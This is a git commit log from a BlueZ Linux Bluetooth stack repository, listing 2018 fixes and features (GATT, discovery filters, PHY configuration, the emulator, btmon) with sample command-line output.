Change-Id: Iab0990928a64453dd5dfa8f519f8f88a1148dd59
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Tue, 2 Oct 2018 08:18:31 +0000 (11:18 +0300)]
gatt: Fix attempting to create device on disconnection
If ATT is disconnected and the state points to an invalid device it
must have been destroyed in the meantime and should not be recreated.
Change-Id: I60d5bafb0130188ce718b38a02e8008b151a5750
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 1 Oct 2018 12:05:15 +0000 (15:05 +0300)]
shared/att: Reset fd when disconnected
Set att->fd to -1 when considered disconnected.
Change-Id: I1b9f28d5aabb7947234e7cf9128b86fe07a6edd7
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 12 Sep 2018 10:25:56 +0000 (13:25 +0300)]
shared/shell: Set rl_readline_name
Set rl_readline_name so the binary name can be used in inputrc.
Change-Id: I1e49901db95dca3c89e0fb3815541afe90b62945
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Fri, 7 Sep 2018 08:07:11 +0000 (11:07 +0300)]
shared/shell: Print commands when --help option is given
This enables the user to see what command could be given in the
non-interactive mode e.g:
> bluetooth-player --help
bluetooth-player ver 5.50
Usage:
bluetooth-player [--options] [commands]
Options:
--timeout Timeout in seconds for non-interactive mode
--version Display version
--help Display help
Commands:
list List available players
show Player information
select Select default player
play Start playback
pause Pause playback
stop Stop playback
next Jump to next item
previous Jump to previous item
fast-forward Fast forward playback
rewind Rewind playback
equalizer Enable/Disable equalizer
repeat Set repeat mode
shuffle Set shuffle mode
scan Set scan mode
change-folder Change current folder
list-items List items of current folder
search Search items containing string
queue Add item to playlist queue
show-item Show item information
Change-Id: Ibb9572f6a9bc13e3a5bf43ebddc40c1642d6b1bc
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 27 Aug 2018 11:37:33 +0000 (14:37 +0300)]
unit: Fix out of bounds
Test /gobex/test_stream_put_req requires 5 buffers to complete.
Change-Id: I277cdcfc8c396598cb609bbf16e7944e94bc3ae0
Signed-off-by: himanshu <h.himanshu@samsung.com>
Anupam Roy [Wed, 22 Aug 2018 14:42:55 +0000 (20:12 +0530)]
btmgmt: Add support to accept multiple PHY options
Before fix-
[hci1]# phy 1MTX 1MRX 2MTX
Too many arguments: 3 > 1
After Fix-
[hci1]# phy 1MRX 1MTX 2MTX
PHY Configuration successfully set
btmon output -
@ MGMT Command: Set PHY Configuration (0x0045) plen 4
Selected PHYs: 0x0e00
LE 1M TX
LE 1M RX
LE 2M TX
< HCI Command: LE Set Default PHY (0x08|0x0031) plen 3
All PHYs preference: 0x00
TX PHYs preference: 0x03
LE 1M
LE 2M
RX PHYs preference: 0x01
LE 1M
> HCI Event: Command Complete (0x0e) plen 4
LE Set Default PHY (0x08|0x0031) ncmd 1
Status: Success (0x00)
@ MGMT Event: Command Complete (0x0001) plen 3
Set PHY Configuration (0x0045) plen 0
Status: Success (0x00)
@ MGMT Event: PHY Configuration Changed (0x0026) plen 4
Selected PHYs: 0x0e00
LE 1M TX
LE 1M RX
LE 2M TX
Change-Id: I22e38e6d381b4c5aefc5a38314fd188874c7d83e
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 1 Aug 2018 13:08:36 +0000 (16:08 +0300)]
doc/adapter-api: Fix working of Discoverable filter
Change-Id: Id74bd073c6a1da41ac7a01b6719442b781ad5d0c
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 1 Aug 2018 11:21:55 +0000 (14:21 +0300)]
client: Fix not resetting filters on scan.clear
If call to SetDiscoveryFilter comes with any value set the daemon will
not attempt to clear the filters, instead the client is suppose to send
an empty dict.
Change-Id: Iff02f62e999e0e292b645a8d300320226fa17105
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Mon, 30 Jul 2018 11:11:38 +0000 (14:11 +0300)]
client: Commit changes to scan filter if active
This detects if the command scan has been triggered and if so commit
changes to filter immediately so they take effect in the current
session.
Change-Id: Iec94318c40a7fd17d281dbc7ccfc54be740e0f60
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 26 Jul 2018 14:13:12 +0000 (17:13 +0300)]
adapter: Fix not keeping discovery filters
If the discovery has been stopped and the client has set filters those
should be put back into filter list since the client may still be
interested in using them the next time it start a scanning.
Change-Id: Ie0b0594b61f5976a802cd537692363c76f16394a
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 26 Jul 2018 12:40:55 +0000 (15:40 +0300)]
client: Add scan.clear discoverable
This implements scan.clear for discoverable filter.
Change-Id: I0fe8d6c6ba54be0ae37479edd88f47a4b71012c5
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 26 Jul 2018 12:26:30 +0000 (15:26 +0300)]
client: Add scan.discoverable command
This adds discoverable command to scan menu which can be used to set
if adapter should become discoverable while scanning:
[bluetooth]# scan.discoverable on
[bluetooth]# scan on
SetDiscoveryFilter success
[CHG] Controller XX:XX:XX:XX:XX:XX Discoverable: yes
Discovery started
[CHG] Controller XX:XX:XX:XX:XX:XX Discovering: yes
[bluetooth]# scan off
Discovery stopped
[CHG] Controller XX:XX:XX:XX:XX:XX Discoverable: no
Change-Id: Ica34e2bc17c72460b5fd41e8104cff2bb5fa0234
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 26 Jul 2018 12:23:05 +0000 (15:23 +0300)]
adapter: Discovery filter discoverable
This implements the discovery filter discoverable and tracks which
clients had enabled it and restores the settings when the last client
enabling it exits.
Change-Id: I5a81a3d9014fbf27e79d38e57b895da0aed68c64
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 26 Jul 2018 12:15:12 +0000 (15:15 +0300)]
doc/adapter-api: Add Discoverable option to SetDiscoveryFilter
This enables the client to set its discoverable setting while
discovering which is very typical situation as usually the setings
application would allow incoming pairing request while scanning, so
this would reduce the number of calls setting Discoverable and
DiscoverableTimeout and restoring after done with discovery.
Change-Id: Ifa7763436795c78ff1499971235ab3d812801552
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:26 +0000 (15:51 +0530)]
mgmt-tester: Update Supported_settings to reflect PHY_CONFIGURATION
Change-Id: I7b7db32446914922bee471bc372a4266f8fb5945
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:25 +0000 (15:51 +0530)]
mgmt-tester: Add support ext create connection and enh conn complete
Change-Id: I530bbf57ef32b76a8c2b62cf722fe62ac96c74be
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:24 +0000 (15:51 +0530)]
mgmt-tester: Add tests for extended scanning and device found
Change-Id: Id848d995087c74edf220fd26b225707455eafe73
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:23 +0000 (15:51 +0530)]
mgmt-tester: Add PHY Configuration test cases
Change-Id: Id0cfcf2c935f872acf7016e422546b1dbba24269
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:22 +0000 (15:51 +0530)]
mgmt-tester: Add extended advertising test cases
Change-Id: Ifee5f87426349617ba8ca6067bc1c0f1a4f26b34
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:21 +0000 (15:51 +0530)]
emulator: Add BREDR 2M & 3M, 3 & 5 Slot packet type support
Change-Id: I807811ddb10174404f72447bd5541c6663dc7658
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Fri, 27 Jul 2018 08:01:04 +0000 (11:01 +0300)]
agent: Make the first agent to register the default
This simplifies the handling of default agent and enforce the IO
capabilities to be set whenever there is an agent available in the
system.
Change-Id: I23b3fe9031d2d61ec2adeabf21af5d7a0f721a77
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Fri, 27 Jul 2018 08:14:04 +0000 (11:14 +0300)]
core: Add AlwaysPairable to main.conf
This adds a new option called AlwaysPairable to main.conf, it can be
used to enable Adapter.Pairable even in case there is no Agent
available.
Since that could be consider a security problem to allow pairing
without user's consent the option defaults to false.
Change-Id: I67e534d5e8a6490ed2c99950c629d6e1ab493e30
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 25 Jul 2018 08:39:55 +0000 (11:39 +0300)]
adapter: Check pending when setting DiscoverableTimeout
This makes DiscoverableTimeout check if discoverable is already pending
and don't attempt to set it once again which may cause discoverable to
be re-enabled when in fact the application just want to set the timeout
alone.
Change-Id: I5ffb43845cf90698ed92e0d06301e77d4fbee8b7
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 25 Jul 2018 08:27:37 +0000 (11:27 +0300)]
adapter: Track pending settings
This tracks settings being changed and in case the settings is already
pending considered it to be done.
Change-Id: Id2d5be79d8a79e2cc2301ff998d46a60d321d219
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Wed, 25 Jul 2018 07:22:45 +0000 (10:22 +0300)]
client: Make show command print DiscoverableTimeout
Controller XX:XX:XX:XX:XX:XX (public)
Name: Vudentz's T460s
Alias: Intel-1
Class: 0x004c010c
Powered: yes
Discoverable: no
DiscoverableTimeout: 0x00000000
Pairable: yes
UUID: Headset AG (
00001112-0000-1000-8000-
00805f9b34fb)
UUID: Generic Attribute Profile (
00001801-0000-1000-8000-
00805f9b34fb)
UUID: A/V Remote Control (
0000110e-0000-1000-8000-
00805f9b34fb)
UUID: SIM Access (
0000112d-0000-1000-8000-
00805f9b34fb)
UUID: Generic Access Profile (
00001800-0000-1000-8000-
00805f9b34fb)
UUID: PnP Information (
00001200-0000-1000-8000-
00805f9b34fb)
UUID: A/V Remote Control Target (
0000110c-0000-1000-8000-
00805f9b34fb)
UUID: Audio Source (
0000110a-0000-1000-8000-
00805f9b34fb)
UUID: Audio Sink (
0000110b-0000-1000-8000-
00805f9b34fb)
UUID: Headset (
00001108-0000-1000-8000-
00805f9b34fb)
Modalias: usb:v1D6Bp0246d0532
Discovering: no
Change-Id: I6cdbeb4d6a62fc2243e6746056a96298c79801f3
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Tue, 24 Jul 2018 13:03:07 +0000 (16:03 +0300)]
client: Add discoverable-timeout command
This adds discoverable-timeout command which can be used to get/set
DiscoverableTimeout property:
[bluetooth]# discoverable-timeout 180
Changing discoverable-timeout 180 succeeded
Change-Id: I294e0facc8d69dc03766f7664a8f0de31fc94a9f
Signed-off-by: himanshu <h.himanshu@samsung.com>
Andrzej Kaczmarek [Mon, 23 Jul 2018 20:31:58 +0000 (22:31 +0200)]
tools: Fix btmon-logger service unit
Bluetooth sockets can be only created in initial network namespace thus
btmon-logger will fail to open monitor socket with PrivateNetwork=true
since this sets up new network namespace for created process.
Change-Id: Iddb6eef006269b6f944d1af9b5de4a66cd9c7c9a
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Thu, 26 Jul 2018 11:23:29 +0000 (16:53 +0530)]
emulator: Fix unsupported command for WRITE_LE_HOST_SUPPORTED
WRITE_LE_HOST_SUPPORTED command needs check for BTDEV_TYPE_LE as well.
Change-Id: I7e860ae650422141917bc9b9ccb9e27aa7a3a113
Signed-off-by: himanshu <h.himanshu@samsung.com>
Andrzej Kaczmarek [Thu, 19 Jul 2018 18:34:30 +0000 (20:34 +0200)]
monitor: Allow Ellisys injection when reading from TTY
Change-Id: I3e132a9a557d5876327064dda1429b0818db8e9f
Signed-off-by: himanshu <h.himanshu@samsung.com>
Andrzej Kaczmarek [Thu, 19 Jul 2018 14:44:09 +0000 (16:44 +0200)]
device: Fix loading devices without Service Changed CCC
This patch provides fix for loading devices which were saved before
support for storing Service Changed CCC was added (
a0b886e26).
Without this fix, after daemon is upgraded from pre-
a0b886e26 to
current version we do not indicate Service Changed to any previously
bonded device since "loaded" CCC value is 0. This means that even if
locla GATT database is changed, bonded peer can assume it did not
change and continue to access structure which yields unexpected
results and this is exactly what happens on iOS devices.
With this patch, if "ServiceChanged" group (added by mentioned commit)
does not exist in config file of a bonded device, we assume indications
for Service Changed characteristic value were enabled by peer as per
Core 5.0, Vol 3, Part G, 7.1:
"This Characteristic Value shall be configured to be indicated,
using the Client Characteristic Configuration descriptor by a
client"
Change-Id: I9a06b3787460b4a62e5e948effc97bc4d3b9b5ab
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 19 Jul 2018 13:58:02 +0000 (16:58 +0300)]
monitor: Use BPF to filter packets by index
This uses a BPF filter to filter packets to specific index.
Change-Id: Ie73c025483c18a40de803e79a24e3a346d5156ce
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 12 Jul 2018 17:01:13 +0000 (20:01 +0300)]
core: Set GATT.Cache default in init_defaults
Change-Id: I41a373066b0fd325981b2bbd03d014186053b10d
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 12 Jul 2018 15:47:17 +0000 (18:47 +0300)]
doc/gatt-api: Fix documentation of prepare-authorize
Make it clearer what values it can assume and also fit in 80 columns.
Change-Id: Iae39d7c79d90673df27cadc9eb9b2d3049ec5e1b
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Thu, 12 Jul 2018 15:29:47 +0000 (18:29 +0300)]
main.conf: Rename MinEncKeySize to KeySize
There is no conflicts, or other key/encryption related parameter, with
just calling this parameter KeySize so we don't have to just enter
initial for something one can assume it implicitly.
Change-Id: Ia2dceb976e35819864dd5b7899f2753698e42b31
Signed-off-by: himanshu <h.himanshu@samsung.com>
David Krauser [Mon, 9 Jul 2018 16:25:01 +0000 (12:25 -0400)]
gatt: provide MTU in ReadValue and WriteValue
This includes the MTU value in ReadValue and WriteValue when acting as
a server.
Note: The actual data can be bigger than the MTU in case of WriteValue
in case of Long Value is written with Prepare + Execute.
Change-Id: I718fe7378e5627aaf8c5680d5bf730c9b0f0ce0b
Signed-off-by: himanshu <h.himanshu@samsung.com>
David Krauser [Mon, 9 Jul 2018 16:27:20 +0000 (12:27 -0400)]
gatt: Make ATT MTU configurable in main.conf
This adds a new entry to GATT group called ExchangeMTU.
Change-Id: Ia026190e18bc759cc565475e629143307e231413
Signed-off-by: himanshu <h.himanshu@samsung.com>
David Krauser [Mon, 9 Jul 2018 16:28:15 +0000 (12:28 -0400)]
doc/gatt-api: Add MTU to ReadValue and WriteValue
Change-Id: Ica225118d9aef841b5d893d5174853c58afb1e73
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Thu, 28 Jun 2018 06:16:50 +0000 (11:46 +0530)]
doc/mgmt-api: Add BREDR PHYs in PHY Configuration Commands
Change-Id: I94b243f25a6d4a4531e37f2f35e28d2542f00268
Signed-off-by: himanshu <h.himanshu@samsung.com>
Luiz Augusto von Dentz [Tue, 26 Jun 2018 10:37:33 +0000 (13:37 +0300)]
policy: Add logic to connect a Sink
If HFP/HSP HS connects and the device also supports a Sink connect it
as well since some devices (e.g. Sony MW600) may not connect it
automatically.
Change-Id: Ie328028bc5ef7751e501ff056521114bf4385117
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Thu, 14 Jun 2018 12:21:20 +0000 (17:51 +0530)]
emulator: Add 5.0 feature support
This adds new hciemu for BT 5.0. Also adds extended advertising,
scanning and connection support in btdev and bthost
Change-Id: Ifb49b0e088b2d7bacc9a09c1989aa4c8b1a6cd2c
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Thu, 14 Jun 2018 12:21:18 +0000 (17:51 +0530)]
monitor: Add support for Secondary PHY flags in Add Advertising
Change-Id: I8f09089d0fa373d43b1d0eb249b730e9bb0326ad
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Thu, 14 Jun 2018 12:21:15 +0000 (17:51 +0530)]
doc/mgmt-api: Add advertising phys support to flags
Change-Id: Ie0941101f8d0cfbd7c0ac0f306c06ef95f663176
Signed-off-by: himanshu <h.himanshu@samsung.com>
Jaganath Kanakkassery [Thu, 14 Jun 2018 12:21:14 +0000 (17:51 +0530)]
doc/mgmt-api: Add support for Set Phy Configuration command
This also adds PHY Configuration Changed Event.
Change-Id: I30900e4dbed3a1282ad87baa6fda610283af2c00
Signed-off-by: himanshu <h.himanshu@samsung.com>
Marcel Holtmann [Sat, 16 Jun 2018 23:05:05 +0000 (01:05 +0200)]
btsnoop: Enable SCO packets for Packet Logger format
Change-Id: Ib04155a4d3a482c3b365d2bbba0c950569fcdf4b
Signed-off-by: himanshu <h.himanshu@samsung.com>
Marcel Holtmann [Sat, 16 Jun 2018 20:53:04 +0000 (22:53 +0200)]
monitor: Add support for decoding Broadcom Enable WBS command
Change-Id: I215bb5976a287ae5544927902c400b032a3ac984
Signed-off-by: himanshu <h.himanshu@samsung.com>